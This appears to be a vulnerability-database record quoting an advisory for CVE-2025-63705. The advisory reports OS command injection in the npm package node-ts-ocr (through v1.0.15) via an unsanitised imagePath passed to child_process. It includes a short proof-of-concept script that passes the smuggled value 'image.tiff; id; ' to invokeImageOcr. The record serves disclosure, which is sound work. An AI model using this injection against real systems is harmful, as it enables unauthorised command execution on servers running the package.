{"uuid": "ff137241-e047-4bb0-ac1b-b07eb0e930a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63705", "type": "seen", "source": "https://gist.github.com/6en6ar/a2ac44da0f4e580190be3e66cfbb9a4a", "content": "Product: https://www.npmjs.com/package/node-ts-ocr\nVersion: v1.0.15\nVulnerability type: OS Command Injection in node-ts-ocr through version 1.0.15\nCVE ID: CVE-2025-63705\n\nDescription: \n\ninvokeImageOcr function inside src/index.js does not sanitize imagePath variable on line 156. that is attacker controlled when using child_process to execute a command.\nnode-ts-ocr ackage provides a wrapper for modifying and manipulating image files. One of the commands it uses for this is tesseract in invokeImageOcr function. If an attacker provides a string such as 'image.tiff; id; ' it can inject this command in the cmd variable that is later executed by child_process.\nThe imagePath variable is not sanitized and this leads to command injection. \n\nPayload used:\n\n> import { Ocr } from 'node-ts-ocr';\n>\n> \n> export async function runTesseract(fileName) {\n>\n>         return await Ocr.invokeImageOcr('test_tesseract', fileName);\n> }\n>\n> async function main() {\n>   try {\n>     var ret = runTesseract('image.tiff; id; ');\n>     console.log('Result testing invokeImageOcr -> ', ret);\n>   } catch (err) {\n>     console.error('error running OCR:', err);\n>   }\n> }\n>\n> main();", "creation_timestamp": "2026-05-06T19:56:42.000000Z"}